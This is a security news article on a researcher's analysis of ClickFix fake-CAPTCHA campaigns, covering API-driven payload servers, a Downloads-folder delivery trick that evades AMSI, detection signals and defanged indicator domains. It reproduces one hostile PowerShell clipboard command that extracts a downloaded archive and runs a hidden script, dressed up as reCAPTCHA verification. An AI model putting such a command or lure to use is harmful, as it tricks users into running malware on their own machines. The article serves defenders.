Skip to content
Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery

Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery

ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office.

New research shows the malicious commands behind its fake “prove you’re human” pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise. The same research also turned up a new delivery method built to slip past Windows’ script scanning.

Security researcher Bert-Jan Pals took apart several ClickFix platforms and analyzed roughly 3,000 payloads from live campaigns. He presented the findings at OrangeCon in early June and published the details on June 30.

ClickFix is simple by design. A booby-trapped page shows a fake CAPTCHA or error, hidden JavaScript drops a command into your clipboard, and the page tells you to press a key combo, paste, and hit Enter. You run the malware yourself.

There’s usually no exploit at the first step and often no file for traditional antivirus to flag, so conventional email and endpoint controls have less to catch.

It works well enough that ESET measured a 517% jump from late 2024 into the first half of 2025, and Microsoft’s 2025 Digital Defense Report put it at 47% of the initial-access cases seen by its Defender Experts team.

The technique now has its own entry in MITRE ATT&CK, T1204.004.

Payloads made to order

The new part is how the payloads are produced. Pals found the pages pulling their commands from backend servers that work like an on-demand service: they take requests, check an access token, log the caller, and return a freshly scrambled command each time.

He asked one server for 100 payloads and got 100 different ones, wrapped in a rotating mix of Base64, AES, TripleDES, Rijndael, and Deflate. Strip the wrapping and, at least for now, they all unpack to the same script, which runs in memory through a PowerShell runspace.

The disguise is disposable; the malware under it is not, though Pals warns the core payload will likely start changing per victim before long. The same platform serves lures in 25 languages and matches the command to the visitor’s operating system, with macOS versions running alongside Windows.

The “as-a-service” label is not just branding. ESET has tracked criminals selling ready-made ClickFix builders to other attackers. Pals found a parallel commercialization one layer deeper, in how each payload is churned out on request.

A quieter way in: the Downloads-folder method

The second finding is a direct answer to defenders who watch the clipboard. Instead of copying a malicious command, the newer pages copy a harmless-looking one.

The page quietly downloads a file to the Downloads folder, and the clipboard gets a short “orchestrator” line that moves that file, unpacks it, and runs the script inside. Because the pasted line is only that orchestrator and not the payload itself, it is built to slide past AMSI, the Windows feature that lets antivirus scan scripts before they run. The bad code sits in the downloaded file, off to the side. The observed clipboard line looked like this:

powershell -C “$t=$env:TMP;Move-Item \”$HOME\Downloads\tmp.zip\” \”$t\7947.zip\”;tar -xf \”$t\7947.zip\” -C \”$t\”;conhost –headless powershell -ExecutionPolicy Bypass -File \”$t\tmp.ps1\” # \”* I am not a robot reCAPTCHA Verification ID:7947 *\””

Execution has drifted toward stealth as well. The original 2024 lure told people to press Windows+R and paste into the Run box. A newer version, common through 2025 and into 2026, points them to Windows+X and the Windows Terminal instead. Terminal use looks more ordinary, and unlike the Run box, it leaves no trace in the RunMRU registry key that investigators normally check.

ClickFix stopped being a criminals-only tool a while ago. Proofpoint tied state-backed groups from Russia, Iran, and North Korea, including APT28, MuddyWater, and Kimsuky, to campaigns that dropped ClickFix into their existing infection chains, and North Korean crews built a fake-job “ClickFake Interview” version to hit cryptocurrency workers.

The trick has spawned named relatives such as FileFix and DownloadFix that lean on other trusted Windows tools. The scale is not theoretical either: security firm Expel found one ClearFake wave that likely infected as many as 147,521 systems since late August 2025.

What defenders should watch

The defensive lesson has not changed. The details have. The dependable signals are process chains, not clipboard text: explorer.exe or WindowsTerminal.exe launching powershell.execmd.exe, or msiexec.exe and reaching out to the network right after.

Those were the most common launchers in Pals’ data, with PowerShell and cmd tied at about 39% each and msiexec close behind at 34%.

Behavioral EDR, application-control rules that limit which programs can call script interpreters, and plain user guidance (“never paste a command you were told to run into the Run box or a terminal”) all still hold. The Downloads-folder method adds one more thing to hunt: an innocent-looking one-liner that touches the Downloads folder and then spawns a hidden PowerShell.

Pals also listed three payload servers seen during the research:

  • comicstar[.]lat
  • babybon[.]cfd
  • merkantalolol[.]asia

A connection to one of these does not prove infection. It means a command was most likely placed in someone’s clipboard.

Pals’ verdict on the technique is blunt: “ClickFix is here to stay.” The pattern across his research is that ClickFix shifts the moment defenders catch up, and the move from one-off scripts to on-demand payload servers is what keeps that adaptation cheap to repeat.

The next thing worth watching is whether the malware itself, not just its wrapper, starts changing from one victim to the next.

Source link